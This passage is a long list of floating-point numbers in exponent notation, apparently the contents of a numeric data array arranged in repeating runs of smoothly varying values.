-0.19628605e-01,
-0.21180209e-01,
-0.23323257e-01,
-0.26269557e-01,
-0.28532716e-01,
-0.28793098e-01,
0.58267605e-02,
0.65732352e-02,
0.75074541e-02,
0.84711155e-02,
0.93507199e-02,
0.10076155e-01,
0.10626074e-01,
0.11019482e-01,
0.11292907e-01,
0.11478950e-01,
0.11598186e-01,
0.11661368e-01,
0.11673780e-01,
0.11638117e-01,
0.11556003e-01,
0.11428879e-01,
0.11258594e-01,
0.11047787e-01,
0.10800015e-01,
0.10519676e-01,
0.10211711e-01,
0.98812887e-02,
0.95334202e-02,
0.91725811e-02,
0.88025127e-02,
0.84261857e-02,
0.80457665e-02,
0.76626753e-02,
0.72779190e-02,
0.68921465e-02,
0.65058237e-02,
0.61194906e-02,
0.57338160e-02,
0.53495029e-02,
0.49673491e-02,
0.45883162e-02,
0.42133094e-02,
0.38431743e-02,
0.34787988e-02,
0.31207474e-02,
0.27695056e-02,
0.24253791e-02,
0.20884008e-02,
0.17583206e-02,
0.14347950e-02,
0.11171702e-02,
0.80453861e-03,
0.49563375e-03,
0.18838409e-03,
-0.12067244e-03,
-0.43773217e-03,
-0.77462569e-03,
-0.11541138e-02,
-0.16205981e-02,
-0.22580458e-02,
-0.32116263e-02,
-0.46886820e-02,
-0.68765748e-02,
-0.97123422e-02,
-0.12634131e-01,
-0.14760367e-01,
-0.15676778e-01,
-0.15906356e-01,
-0.16229935e-01,
-0.16910229e-01,
-0.17826060e-01,
-0.18888203e-01,
-0.20143216e-01,
-0.21733690e-01,
-0.23955522e-01,
-0.26971251e-01,
-0.29147699e-01,
-0.29363733e-01,
0.54070717e-02,
0.61022816e-02,
0.69719772e-02,
0.78685069e-02,
0.86859381e-02,
0.93587395e-02,
0.98667927e-02,
0.10227575e-01,
0.10474904e-01,
0.10638993e-01,
0.10738960e-01,
0.10784928e-01,
0.10782113e-01,
0.10733562e-01,
0.10641565e-01,
0.10508422e-01,
0.10336863e-01,
0.10130250e-01,
0.98925652e-02,
0.96282410e-02,
0.93418919e-02,
0.90379883e-02,
0.87205544e-02,
0.83929868e-02,
0.80580246e-02,
0.77177160e-02,
0.73734652e-02,
0.70262798e-02,
0.66767824e-02,
0.63254600e-02,
0.59727905e-02,
0.56192488e-02,
0.52654315e-02,
0.49121627e-02,
0.45603677e-02,
0.42109452e-02,
0.38648082e-02,
0.35230482e-02,
0.31864857e-02,
0.28557458e-02,
0.25313764e-02,
0.22137545e-02,
0.19029069e-02,
0.15987142e-02,
0.13008172e-02,
0.10086106e-02,
0.72139426e-03,
0.43811998e-03,
0.15723592e-03,
-0.12376621e-03,
-0.40906059e-03,
-0.70619176e-03,
-0.10294477e-02,
-0.14063339e-02,
-0.18904223e-02,
-0.25809507e-02,
-0.36431164e-02,
-0.52961027e-02,
-0.76976335e-02,
-0.10682030e-01,
-0.13564016e-01,
-0.15468677e-01,
-0.16168477e-01,
-0.16328586e-01,
-0.16677296e-01,
-0.17379910e-01,
-0.18295975e-01,
-0.19355783e-01,
-0.20619802e-01,
-0.22241637e-01,
-0.24535159e-01,
-0.27597541e-01,
-0.29646901e-01,
-0.29775085e-01,
0.50061666e-02,
0.56525916e-02,
0.64607500e-02,
0.72929878e-02,
0.80504669e-02,
0.86719748e-02,
0.91386139e-02,
0.94665419e-02,
0.96872011e-02,
0.98287789e-02,
0.99092564e-02,
0.99384002e-02,
0.99215917e-02,
0.98623503e-02,
0.97636050e-02,
0.96283276e-02,
0.94598122e-02,
0.92617264e-02,
0.90380237e-02,
0.87927980e-02,
0.85300365e-02,
0.82533574e-02,
0.79658525e-02,
0.76700603e-02,
0.73679010e-02,
0.70607387e-02,
0.67495992e-02,
0.64351326e-02,
0.61177979e-02,
0.57979897e-02,
0.54761712e-02,
0.51528304e-02,
0.48285746e-02,
0.45042443e-02,
0.41807955e-02,
0.38590934e-02,
0.35402139e-02,
0.32251289e-02,
0.29146906e-02,
0.26096692e-02,
0.23106080e-02,
0.20178384e-02,
0.17315357e-02,
0.14516271e-02,
0.11777402e-02,
0.90943626e-03,
0.64600032e-03,
0.38659063e-03,
0.12990853e-03,
-0.12597593e-03,
-0.38408191e-03,
-0.64947037e-03,
-0.93128323e-03,
-0.12469848e-02,
-0.16304143e-02,
-0.21464191e-02,
-0.29125693e-02,
-0.41156993e-02,
-0.59804209e-02,
-0.86140092e-02,
-0.11723425e-01,
-0.14505944e-01,
-0.16143575e-01,
-0.16627248e-01,
-0.16734317e-01,
-0.17108738e-01,
-0.17822174e-01,
-0.18725207e-01,
-0.19769130e-01,
-0.21026963e-01,
-0.22663718e-01,
-0.25009871e-01,
-0.28077208e-01,
-0.29936161e-01,
-0.29903086e-01,
0.46191481e-02,
0.52183974e-02,
0.59670168e-02,
0.67369491e-02,
0.74361749e-02,
0.80076661e-02,
0.84337806e-02,
0.87295286e-02,
0.89242216e-02,
0.90442616e-02,
0.91067078e-02,
0.91211265e-02,
0.90931328e-02,
0.90266792e-02,
0.89251632e-02,
0.87919217e-02,
0.86304275e-02,
0.84443204e-02,
0.82372911e-02,
0.80128787e-02,
0.77742967e-02,
0.75243628e-02,
0.72654327e-02,
0.69993068e-02,
0.67273136e-02,
0.64504785e-02,
0.61694812e-02,
0.58848094e-02,
0.55968449e-02,
0.53059584e-02,
0.50125136e-02,
0.47170832e-02,
0.44203578e-02,
0.41231164e-02,
0.38261772e-02,
0.35306206e-02,
0.32374398e-02,
0.29475170e-02,
0.26617502e-02,
0.23809616e-02,
0.21057320e-02,
0.18363672e-02,
0.15731406e-02,
0.13160043e-02,
0.10647054e-02,
0.81881043e-03,
0.57776505e-03,
0.34065990e-03,
0.10639309e-03,
-0.12660332e-03,
-0.36068761e-03,
-0.59937662e-03,
-0.84880623e-03,
-0.11204274e-02,
-0.14357190e-02,
-0.18365043e-02,
-0.24020236e-02,
-0.32714859e-02,
-0.46532732e-02,
-0.67663151e-02,
-0.96402615e-02,
-0.12831893e-01,
-0.15441692e-01,
-0.16770078e-01,
-0.17045652e-01,
-0.17114457e-01,
-0.17508077e-01,
-0.18213695e-01,
-0.19082699e-01,
-0.20087397e-01,
-0.21311399e-01,
-0.22931056e-01,
-0.25289452e-01,
-0.28288210e-01,
-0.29855460e-01,
-0.29540431e-01,
0.42438372e-02,
0.47970237e-02,
0.54875640e-02,
0.61967750e-02,
0.68393080e-02,
0.73622656e-02,
0.77493028e-02,
0.80144051e-02,
0.81849089e-02,
0.82855793e-02,
0.83326427e-02,
0.83354777e-02,
0.82998471e-02,
0.82299737e-02,
0.81294924e-02,
0.80018509e-02,
0.78504579e-02,
0.76786745e-02,
0.74897227e-02,
0.72865360e-02,
0.70716739e-02,
0.68472759e-02,
0.66150147e-02,
0.63761803e-02,
0.61317808e-02,
0.58825328e-02,
0.56289569e-02,
0.53714588e-02,
0.51103933e-02,
0.48460537e-02,
0.45788516e-02,
0.43093446e-02,
0.40383078e-02,
0.37663926e-02,
0.34944667e-02,
0.32235801e-02,
0.29546390e-02,
0.26885115e-02,
0.24261076e-02,
0.21682207e-02,
0.19154118e-02,
0.16681626e-02,
0.14266440e-02,
0.11909056e-02,
0.96084451e-03,
0.73608221e-03,
0.51601185e-03,
0.29983022e-03,
0.86455977e-04,
-0.12548176e-03,
-0.33780126e-03,
-0.55322744e-03,
-0.77611348e-03,
-0.10140111e-02,
-0.12810014e-02,
-0.16041107e-02,
-0.20356334e-02,
-0.26726879e-02,
-0.36793316e-02,
-0.52829208e-02,
-0.76788506e-02,
-0.10785309e-01,
-0.13992673e-01,
-0.16345447e-01,
-0.17329855e-01,
-0.17411666e-01,
-0.17451219e-01,
-0.17846853e-01,
-0.18514944e-01,
-0.19316018e-01,
-0.20241588e-01,
-0.21382602e-01,
-0.22925586e-01,
-0.25219092e-01,
-0.28025590e-01,
-0.29143283e-01,
-0.28364539e-01,
0.38802244e-02,
0.43883347e-02,
0.50221425e-02,
0.56721950e-02,
0.62597329e-02,
0.67359642e-02,
0.70858784e-02,
0.73225168e-02,
0.74713244e-02,
0.75554666e-02,
0.75903148e-02,
0.75849718e-02,
0.75452076e-02,
0.74753161e-02,
0.73789642e-02,
0.72595305e-02,
0.71201995e-02,
0.69639226e-02,
0.67933705e-02,
0.66109342e-02,
0.64186375e-02,
0.62180408e-02,
0.60103335e-02,
0.57964721e-02,
0.55771875e-02,
0.53530186e-02,
0.51244237e-02,
0.48917811e-02,
0.46553644e-02,
0.44155009e-02,
0.41726306e-02,
0.39273482e-02,
0.36802413e-02,
0.34321158e-02,
0.31838417e-02,
0.29362249e-02,
0.26901832e-02,
0.24466240e-02,
0.22063667e-02,
0.19700988e-02,
0.17385191e-02,
0.15121014e-02,
0.12910479e-02,
0.10755060e-02,
0.86542196e-03,
0.66050846e-03,
0.46016547e-03,
0.26359106e-03,
0.69742789e-04,
-0.12264148e-03,
-0.31505234e-03,
-0.50968054e-03,
-0.70983008e-03,
-0.92059938e-03,
-0.11514680e-02,
-0.14202188e-02,
-0.17611791e-02,
-0.22402222e-02,
-0.29767312e-02,
-0.41622054e-02,
-0.60354555e-02,
-0.87412195e-02,
-0.12048509e-01,
-0.15178418e-01,
-0.17183300e-01,
-0.17799482e-01,
-0.17704254e-01,
-0.17711623e-01,
-0.18075820e-01,
-0.18659104e-01,
-0.19336520e-01,
-0.20114373e-01,
-0.21086661e-01,
-0.22448380e-01,
-0.24543686e-01,
-0.26968870e-01,
-0.27425798e-01,
-0.25982859e-01,
0.35297391e-02,
0.39938814e-02,
0.45724809e-02,
0.51651788e-02,
0.56997212e-02,
0.61313836e-02,
0.64464915e-02,
0.66571729e-02,
0.67870081e-02,
0.68575540e-02,
0.68832617e-02,
0.68728351e-02,
0.68318904e-02,
0.67646406e-02,
0.66746362e-02,
0.65650316e-02,
0.64386618e-02,
0.62980657e-02,
0.61454801e-02,
0.59827766e-02,
0.58114552e-02,
0.56327097e-02,
0.54474538e-02,
0.52563460e-02,
0.50598914e-02,
0.48585772e-02,
0.46528103e-02,
0.44429065e-02,
0.42291693e-02,
0.40119542e-02,
0.37917392e-02,
0.35690265e-02,
0.33443815e-02,
0.31186463e-02,
0.28926407e-02,
0.26670455e-02,
0.24426919e-02,
0.22205103e-02,
0.20012076e-02,
0.17854705e-02,
0.15739684e-02,
0.13671899e-02,
0.11654871e-02,
0.96899009e-03,
0.77774836e-03,
0.59148681e-03,
0.40965760e-03,
0.23145005e-03,
0.55848002e-04,
-0.11826525e-03,
-0.29229349e-03,
-0.46810537e-03,
-0.64812414e-03,
-0.83613564e-03,
-0.10385482e-02,
-0.12673559e-02,
-0.15453240e-02,
-0.19167364e-02,
-0.24653263e-02,
-0.33373679e-02,
-0.47518569e-02,
-0.69443211e-02,
-0.99710366e-02,
-0.13414696e-01,
-0.16345950e-01,
-0.17911386e-01,
-0.18145934e-01,
-0.17885052e-01,
-0.17836532e-01,
-0.18110715e-01,
-0.18532671e-01,
-0.18993681e-01,
-0.19508589e-01,
-0.20170461e-01,
-0.21185948e-01,
-0.22894341e-01,
-0.24724348e-01,
-0.24370475e-01,
-0.22268195e-01,
0.31942856e-02,
0.36158317e-02,
0.41410751e-02,
0.46785669e-02,
0.51624421e-02,
0.55519687e-02,
0.58347746e-02,
0.60220673e-02,
0.61355513e-02,
0.61951405e-02,
0.62143006e-02,
0.62012500e-02,
0.61613480e-02,
0.60985861e-02,
0.60162526e-02,
0.59171882e-02,
0.58038891e-02,
0.56785326e-02,
0.55429381e-02,
0.53985524e-02,
0.52465028e-02,
0.50876997e-02,
0.49228426e-02,
0.47523943e-02,
0.45767589e-02,
0.43963231e-02,
0.42114421e-02,
0.40224311e-02,
0.38296313e-02,
0.36334537e-02,
0.34343314e-02,
0.32326737e-02,
0.30291770e-02,
0.28245456e-02,
0.26194807e-02,
0.24146992e-02,
0.22109461e-02,
0.20089839e-02,
0.18095284e-02,
0.16132607e-02,
0.14207716e-02,
0.12325735e-02,
0.10491284e-02,
0.87066717e-03,
0.69715641e-03,
0.52842626e-03,
0.36394782e-03,
0.20294097e-03,
0.44450713e-04,
-0.11262445e-03,
-0.26963896e-03,
-0.42814302e-03,
-0.59004046e-03,
-0.75823971e-03,
-0.93725865e-03,
-0.11351963e-02,
-0.13674999e-02,
-0.16641312e-02,
-0.20829688e-02,
-0.27305069e-02,
-0.37841904e-02,
-0.54863039e-02,
-0.80432529e-02,
-0.11373957e-01,
-0.14846842e-01,
-0.17431933e-01,
-0.18471425e-01,
-0.18317387e-01,
-0.17884307e-01,
-0.17721877e-01,
-0.17807389e-01,
-0.17944368e-01,
-0.18038927e-01,
-0.18111341e-01,
-0.18263325e-01,
-0.18744303e-01,
-0.19931488e-01,
-0.21152221e-01,
-0.20258194e-01,
-0.18154927e-01,
0.28755944e-02,
0.32562227e-02,
0.37303183e-02,
0.42150859e-02,
0.46508745e-02,
0.50008302e-02,
0.52538323e-02,
0.54201568e-02,
0.55196281e-02,
0.55704820e-02,
0.55851364e-02,
0.55712480e-02,
0.55338335e-02,
0.54765893e-02,
0.54024858e-02,
0.53140409e-02,
0.52134213e-02,
0.51024402e-02,
0.49825548e-02,
0.48549226e-02,
0.47204504e-02,
0.45797881e-02,
0.44334051e-02,
0.42817341e-02,
0.41251029e-02,
0.39637811e-02,
0.37980722e-02,
0.36283240e-02,
0.34549329e-02,
0.32783179e-02,
0.30987991e-02,
0.29169142e-02,
0.27332988e-02,
0.25485274e-02,
0.23631887e-02,
0.21780862e-02,
0.19938366e-02,
0.18110086e-02,
0.16303621e-02,
0.14525431e-02,
0.12780537e-02,
0.11074701e-02,
0.94128802e-03,
0.77982916e-03,
0.62306761e-03,
0.47078525e-03,
0.32257999e-03,
0.17765176e-03,
0.35159428e-04,
-0.10600228e-03,
-0.24719909e-03,
-0.38967439e-03,
-0.53508411e-03,
-0.68561384e-03,
-0.84459153e-03,
-0.10175847e-02,
-0.12152690e-02,
-0.14582346e-02,
-0.17864328e-02,
-0.22758693e-02,
-0.30617819e-02,
-0.43552169e-02,
-0.64090681e-02,
-0.93599092e-02,
-0.12933343e-01,
-0.16276378e-01,
-0.18346461e-01,
-0.18781584e-01,
-0.18226096e-01,
-0.17576260e-01,
-0.17187940e-01,
-0.16925601e-01,
-0.16586989e-01,
-0.16100395e-01,
-0.15514784e-01,
-0.15000328e-01,
-0.14952605e-01,
-0.15897794e-01,
-0.17156484e-01,
-0.16811144e-01,
-0.16059641e-01,
0.25749404e-02,
0.29165992e-02,
0.33420587e-02,
0.37768418e-02,
0.41672788e-02,
0.44802395e-02,
0.47057904e-02,
0.48532858e-02,
0.49406979e-02,
0.49845842e-02,
0.49962578e-02,
0.49827271e-02,
0.49485951e-02,
0.48972480e-02,
0.48313839e-02,
0.47532097e-02,
0.46645310e-02,
0.45668236e-02,
0.44612922e-02,
0.43488974e-02,
0.42303428e-02,
0.41060960e-02,
0.39765178e-02,
0.38419361e-02,
0.37026398e-02,
0.35588457e-02,
0.34108032e-02,
0.32588942e-02,
0.31035459e-02,
0.29450748e-02,
0.27838917e-02,
0.26205610e-02,
0.24555970e-02,
0.22894754e-02,
0.21228124e-02,
0.19562438e-02,
0.17903824e-02,
0.16257121e-02,
0.14628675e-02,
0.13024764e-02,
0.11450466e-02,
0.99116936e-03,
0.84134901e-03,
0.69589523e-03,
0.55489980e-03,
0.41809730e-03,
0.28507152e-03,
0.15523843e-03,
0.27696389e-04,
-0.98706871e-04,
-0.22511023e-03,
-0.35272306e-03,
-0.48294108e-03,
-0.61748014e-03,
-0.75878931e-03,
-0.91083115e-03,
-0.10810896e-02,
-0.12839842e-02,
-0.15473457e-02,
-0.19251802e-02,
-0.25176301e-02,
-0.34943304e-02,
-0.50974879e-02,
-0.75646825e-02,
-0.10904021e-01,
-0.14594574e-01,
-0.17590806e-01,
-0.18962247e-01,
-0.18717308e-01,
-0.17718159e-01,
-0.16742069e-01,
-0.15938997e-01,
-0.15096456e-01,
-0.14041902e-01,
-0.12778138e-01,
-0.11481387e-01,
-0.10537255e-01,
-0.10632942e-01,
-0.12457354e-01,
-0.15134930e-01,
-0.16634356e-01,
-0.17927606e-01,
0.22929932e-02,
0.25978240e-02,
0.29773721e-02,
0.33650806e-02,
0.37129789e-02,
0.39914814e-02,
0.41917670e-02,
0.43222816e-02,
0.43991888e-02,
0.44373926e-02,
0.44470965e-02,
0.44346289e-02,
0.44041476e-02,
0.43587163e-02,
0.43007480e-02,
0.42321626e-02,
0.41544731e-02,
0.40688911e-02,
0.39764121e-02,
0.38778088e-02,
0.37736101e-02,
0.36642191e-02,
0.35499295e-02,
0.34309430e-02,
0.33074785e-02,
0.31797730e-02,
0.30480758e-02,
0.29127430e-02,
0.27741243e-02,
0.26325521e-02,
0.24885421e-02,
0.23425936e-02,
0.21950973e-02,
0.20465283e-02,
0.18974531e-02,
0.17483715e-02,
0.15998175e-02,
0.14523078e-02,
0.13063080e-02,
0.11623653e-02,
0.10211229e-02,
0.88305573e-03,
0.74868003e-03,
0.61835541e-03,
0.49214705e-03,
0.36987942e-03,
0.25109114e-03,
0.13533220e-03,
0.21703247e-04,
-0.90926857e-04,
-0.20352546e-03,
-0.31733362e-03,
-0.43350609e-03,
-0.55338885e-03,
-0.67877601e-03,
-0.81268302e-03,
-0.96038845e-03,
-0.11320858e-02,
-0.13475646e-02,
-0.16453972e-02,
-0.20989443e-02,
-0.28392603e-02,
-0.40741763e-02,
-0.60647582e-02,
-0.89876316e-02,
-0.12647802e-01,
-0.16243244e-01,
-0.18616004e-01,
-0.19093577e-01,
-0.18077876e-01,
-0.16530357e-01,
-0.15029374e-01,
-0.13550565e-01,
-0.11885053e-01,
-0.99943755e-02,
-0.81011895e-02,
-0.66745249e-02,
-0.64049885e-02,
-0.81325630e-02,
-0.12245839e-01,
-0.17089149e-01,
-0.20167973e-01,
-0.22245478e-01,
0.20299123e-02,
0.23001628e-02,
0.26366366e-02,
0.29802567e-02,
0.32884392e-02,
0.35349382e-02,
0.37119628e-02,
0.38270687e-02,
0.38946737e-02,
0.39280793e-02,
0.39364123e-02,
0.39253496e-02,
0.38986101e-02,
0.38588869e-02,
0.38082711e-02,
0.37484372e-02,
0.36807158e-02,
0.36061385e-02,
0.35254795e-02,
0.34393084e-02,
0.33480865e-02,
0.32521591e-02,
0.31517555e-02,
0.30470104e-02,
0.29380592e-02,
0.28251486e-02,
0.27085962e-02,
0.25886497e-02,
0.24655664e-02,
0.23397931e-02,
0.22118504e-02,
0.20821332e-02,
0.19509925e-02,
0.18189276e-02,
0.16863818e-02,
0.15537632e-02,
0.14214842e-02,
0.12901434e-02,
0.11600459e-02,
0.10316600e-02,
0.90566400e-03,
0.78258343e-03,
0.66282053e-03,
0.54670696e-03,
0.43438902e-03,
0.32569954e-03,
0.22029619e-03,
0.11765160e-03,
0.16918209e-04,
-0.82841863e-04,
-0.18264857e-03,
-0.28356965e-03,
-0.38668749e-03,
-0.49303711e-03,
-0.60395780e-03,
-0.72176283e-03,
-0.85029344e-03,
-0.99679129e-03,
-0.11756377e-02,
-0.14147292e-02,
-0.17678216e-02,
-0.23343621e-02,
-0.32830362e-02,
-0.48576673e-02,
-0.73089227e-02,
-0.10680980e-01,
-0.14495158e-01,
-0.17674342e-01,
-0.19089572e-01,
-0.18462013e-01,
-0.16541397e-01,
-0.14258571e-01,
-0.11979854e-01,
-0.96273897e-02,
-0.71729873e-02,
-0.49013551e-02,
-0.33841925e-02,
-0.33057944e-02,
-0.52674399e-02,
-0.96266540e-02,
-0.15894135e-01,
-0.21601008e-01,
-0.24401912e-01,
-0.25605565e-01,
0.17854190e-02,
0.20233756e-02,
0.23196433e-02,
0.26221615e-02,
0.28933994e-02,
0.31102363e-02,
0.32658295e-02,
0.33668731e-02,
0.34261208e-02,
0.34553525e-02,
0.34626699e-02,
0.34531134e-02,
0.34299616e-02,
0.33955548e-02,
0.33516849e-02,
0.32997937e-02,
0.32410624e-02,
0.31763858e-02,
0.31063606e-02,
0.30314266e-02,
0.29519610e-02,
0.28682463e-02,
0.27804545e-02,
0.26887048e-02,
0.25930938e-02,
0.24938518e-02,
0.23912911e-02,
0.22855958e-02,
0.21769952e-02,
0.20659990e-02,
0.19530528e-02,
0.18384572e-02,
0.17226556e-02,
0.16060474e-02,
0.14889956e-02,
0.13717994e-02,
0.12548816e-02,
0.11386774e-02,
0.10235143e-02,
0.90985751e-03,
0.79824886e-03,
0.68927044e-03,
0.58327196e-03,
0.48052520e-03,
0.38123387e-03,
0.28524606e-03,
0.19232801e-03,
0.10188403e-03,
0.13148935e-04,
-0.74649892e-04,
-0.16256304e-03,
-0.25152223e-03,
-0.34248683e-03,
-0.43625894e-03,
-0.53394295e-03,
-0.63723064e-03,
-0.74901024e-03,
-0.87452604e-03,
-0.10243639e-02,
-0.12190320e-02,
-0.14982653e-02,
-0.19371029e-02,
-0.26686641e-02,
-0.39032472e-02,
-0.59056627e-02,
-0.88597359e-02,
-0.12578117e-01,
-0.16234819e-01,
-0.18552493e-01,
-0.18625131e-01,
-0.16659645e-01,
-0.13658211e-01,
-0.10453119e-01,
-0.73239915e-02,
-0.43831225e-02,
-0.19895632e-02,
-0.75665663e-03,
-0.12641177e-02,
-0.37606840e-02,
-0.81160162e-02,
-0.14009449e-01,
-0.20516826e-01,
-0.25252979e-01,
-0.26749684e-01,
-0.26949666e-01,
0.15589494e-02,
0.17668876e-02,
0.20257886e-02,
0.22901346e-02,
0.25271075e-02,
0.27164973e-02,
0.28523379e-02,
0.29405085e-02,
0.29921937e-02,
0.30177287e-02,
0.30242268e-02,
0.30161096e-02,
0.29962433e-02,
0.29666633e-02,
0.29289203e-02,
0.28842422e-02,
0.28336111e-02,
0.27777818e-02,
0.27172987e-02,
0.26525310e-02,
0.25837307e-02,
0.25110987e-02,
0.24347827e-02,
0.23548861e-02,
0.22715516e-02,
0.21849549e-02,
0.20953005e-02,
0.20027831e-02,
0.19077143e-02,
0.18105077e-02,
0.17114856e-02,
0.16110209e-02,
0.15095366e-02,
0.14073697e-02,
0.13047857e-02,
0.12020444e-02,
0.10995269e-02,
0.99746429e-03,
0.89634967e-03,
0.79651998e-03,
0.69846597e-03,
0.60272694e-03,
0.50964806e-03,
0.41947985e-03,
0.33230876e-03,
0.24821598e-03,
0.16693448e-03,
0.87793873e-04,
0.10210203e-04,
-0.66529035e-04,
-0.14337612e-03,
-0.22124445e-03,
-0.30088221e-03,
-0.38298120e-03,
-0.46846602e-03,
-0.55856747e-03,
-0.65543054e-03,
-0.76301250e-03,
-0.88915287e-03,
-0.10492229e-02,
-0.12729177e-02,
-0.16169698e-02,
-0.21851282e-02,
-0.31512871e-02,
-0.47627124e-02,
-0.72655436e-02,
-0.10682470e-01,
-0.14481976e-01,
-0.17479382e-01,
-0.18369909e-01,
-0.16695704e-01,
-0.13192192e-01,
-0.90477718e-02,
-0.50837407e-02,
-0.17456600e-02,
0.50775765e-03,
0.11405456e-02,
-0.15771549e-03,
-0.32012013e-02,
-0.74220751e-02,
-0.12348277e-01,
-0.17880509e-01,
-0.23407269e-01,
-0.26902754e-01,
-0.27527036e-01,
-0.27351677e-01,
0.13498098e-02,
0.15299571e-02,
0.17542662e-02,
0.19832880e-02,
0.21885794e-02,
0.23526303e-02,
0.24702842e-02,
0.25466559e-02,
0.25914581e-02,
0.26136602e-02,
0.26194309e-02,
0.26126066e-02,
0.25956824e-02,
0.25704356e-02,
0.25382130e-02,
0.25000437e-02,
0.24567009e-02,
0.24088090e-02,
0.23568932e-02,
0.23012925e-02,
0.22421621e-02,
0.21796003e-02,
0.21137316e-02,
0.20446836e-02,
0.19726283e-02,
0.18976876e-02,
0.18199275e-02,
0.17396152e-02,
0.16571450e-02,
0.15727388e-02,
0.14866672e-02,
0.13993700e-02,
0.13112020e-02,
0.12224860e-02,
0.11333575e-02,
0.10441266e-02,
0.95500512e-03,
0.86619117e-03,
0.77818817e-03,
0.69130980e-03,
0.60596765e-03,
0.52263023e-03,
0.44163744e-03,
0.36320378e-03,
0.28736555e-03,
0.21433813e-03,
0.14382407e-03,
0.75184740e-04,
0.79467936e-05,
-0.58581456e-04,
-0.12522114e-03,
-0.19278513e-03,
-0.26187330e-03,
-0.33317646e-03,
-0.40739289e-03,
-0.48542794e-03,
-0.56885718e-03,
-0.66080934e-03,
-0.76709641e-03,
-0.89942804e-03,
-0.10802879e-02,
-0.13528165e-02,
-0.17975677e-02,
-0.25551619e-02,
-0.38419224e-02,
-0.59169503e-02,
-0.89288345e-02,
-0.12605214e-01,
-0.15980633e-01,
-0.17610485e-01,
-0.16458714e-01,
-0.12757922e-01,
-0.78148004e-02,
-0.30447829e-02,
0.58803929e-03,
0.24830827e-02,
0.23169408e-02,
0.21695795e-03,
-0.31757678e-02,
-0.70471163e-02,
-0.10940184e-01,
-0.15055859e-01,
-0.19874115e-01,
-0.24761699e-01,
-0.27603908e-01,
-0.27851652e-01,
-0.27539870e-01,
0.11573090e-02,
0.13118297e-02,
0.15042420e-02,
0.17007013e-02,
0.18768052e-02,
0.20175355e-02,
0.21184757e-02,
0.21840241e-02,
0.22225198e-02,
0.22416625e-02,
0.22467452e-02,
0.22410604e-02,
0.22267597e-02,
0.22053893e-02,
0.21781034e-02,
0.21457481e-02,
0.21089534e-02,
0.20682334e-02,
0.20240291e-02,
0.19766658e-02,
0.19262728e-02,
0.18728701e-02,
0.18165240e-02,
0.17574138e-02,
0.16956952e-02,
0.16314362e-02,
0.15646521e-02,
0.14956590e-02,
0.14248277e-02,
0.13522609e-02,
0.12782239e-02,
0.12031234e-02,
0.11273304e-02,
0.10510463e-02,
0.97442413e-03,
0.89773658e-03,
0.82104641e-03,
0.74460293e-03,
0.66874258e-03,
0.59397513e-03,
0.52050536e-03,
0.44870362e-03,
0.37896109e-03,
0.31140892e-03,
0.24619559e-03,
0.18341106e-03,
0.12278830e-03,
0.63891501e-04,
0.61988922e-05,
-0.50909595e-04,
-0.10814507e-03,
-0.16616660e-03,
-0.22550514e-03,
-0.28680690e-03,
-0.35062019e-03,
-0.41758217e-03,
-0.48887444e-03,
-0.56698389e-03,
-0.65631996e-03,
-0.76583039e-03,
-0.91279822e-03,
-0.11302640e-02,
-0.14807846e-02,
-0.20767434e-02,
-0.31004245e-02,
-0.47965096e-02,
-0.73740366e-02,
-0.10751202e-01,
-0.14214644e-01,
-0.16375747e-01,
-0.15823588e-01,
-0.12226088e-01,
-0.67599509e-02,
-0.13356704e-02,
0.24713113e-02,
0.38747264e-02,
0.28679580e-02,
0.11903104e-03,
-0.33430753e-02,
-0.66695027e-02,
-0.96058799e-02,
-0.12532249e-01,
-0.16198792e-01,
-0.21001449e-01,
-0.25733067e-01,
-0.28118331e-01,
-0.27977712e-01,
-0.27381005e-01,
0.98083925e-03,
0.11118341e-02,
0.12749631e-02,
0.14415317e-02,
0.15908498e-02,
0.17101859e-02,
0.17957988e-02,
0.18514196e-02,
0.18841210e-02,
0.19004331e-02,
0.19048484e-02,
0.19001653e-02,
0.18882133e-02,
0.18703013e-02,
0.18473966e-02,
0.18202132e-02,
0.17892951e-02,
0.17550559e-02,
0.17178158e-02,
0.16778519e-02,
0.16353233e-02,
0.15902224e-02,
0.15425772e-02,
0.14925570e-02,
0.14402777e-02,
0.13857534e-02,
0.13290886e-02,
0.12705566e-02,
0.12104037e-02,
0.11487597e-02,
0.10858473e-02,
0.10220249e-02,
0.95764559e-03,
0.89280307e-03,
0.82777342e-03,
0.76263881e-03,
0.69743692e-03,
0.63244364e-03,
0.56787435e-03,
0.50428713e-03,
0.44183279e-03,
0.38074178e-03,
0.32141685e-03,
0.26393912e-03,
0.20854473e-03,
0.15521001e-03,
0.10369664e-03,
0.53771990e-04,
0.48405859e-05,
-0.43625452e-04,
-0.92199283e-04,
-0.14142317e-03,
-0.19180843e-03,
-0.24387297e-03,
-0.29810442e-03,
-0.35491036e-03,
-0.41522519e-03,
-0.48093690e-03,
-0.55558363e-03,
-0.64595538e-03,
-0.76544558e-03,
-0.93956996e-03,
-0.12170107e-02,
-0.16869402e-02,
-0.24994221e-02,
-0.38717622e-02,
-0.60297726e-02,
-0.90123136e-02,
-0.12333807e-01,
-0.14771741e-01,
-0.14760138e-01,
-0.11492035e-01,
-0.58502830e-02,
-0.39222432e-04,
0.38003121e-02,
0.46805777e-02,
0.29477894e-02,
-0.19698367e-03,
-0.34707133e-02,
-0.61565377e-02,
-0.82763545e-02,
-0.10341127e-01,
-0.13046334e-01,
-0.17025929e-01,
-0.22158746e-01,
-0.26648698e-01,
-0.28339002e-01,
-0.27549669e-01,
-0.26395839e-01,
0.81985246e-03,
0.92936639e-03,
0.10657535e-02,
0.12050235e-02,
0.13298774e-02,
0.14296711e-02,
0.15012774e-02,
0.15478174e-02,
0.15752059e-02,
0.15889057e-02,
0.15926794e-02,
0.15888754e-02,
0.15790189e-02,
0.15641790e-02,
0.15451561e-02,
0.15225782e-02,
0.14969195e-02,
0.14685052e-02,
0.14375511e-02,
0.14042476e-02,
0.13687719e-02,
0.13311717e-02,
0.12914606e-02,
0.12497153e-02,
0.12060066e-02,
0.11603512e-02,
0.11129703e-02,
0.10640363e-02,
0.10136392e-02,
0.96200767e-03,
0.90932270e-03,
0.85588358e-03,
0.80193224e-03,
0.74761838e-03,
0.69321913e-03,
0.63866674e-03,
0.58403739e-03,
0.52954548e-03,
0.47544795e-03,
0.42208337e-03,
0.36977371e-03,
0.31858659e-03,
0.26881197e-03,
0.22063967e-03,
0.17424425e-03,
0.12957763e-03,
0.86436587e-04,
0.44699889e-04,
0.37974135e-05,
-0.36786892e-04,
-0.77447279e-04,
-0.11859972e-03,
-0.16077398e-03,
-0.20438076e-03,
-0.24981576e-03,
-0.29733716e-03,
-0.34771886e-03,
-0.40232454e-03,
-0.46408881e-03,
-0.53816853e-03,
-0.63491607e-03,
-0.77419216e-03,
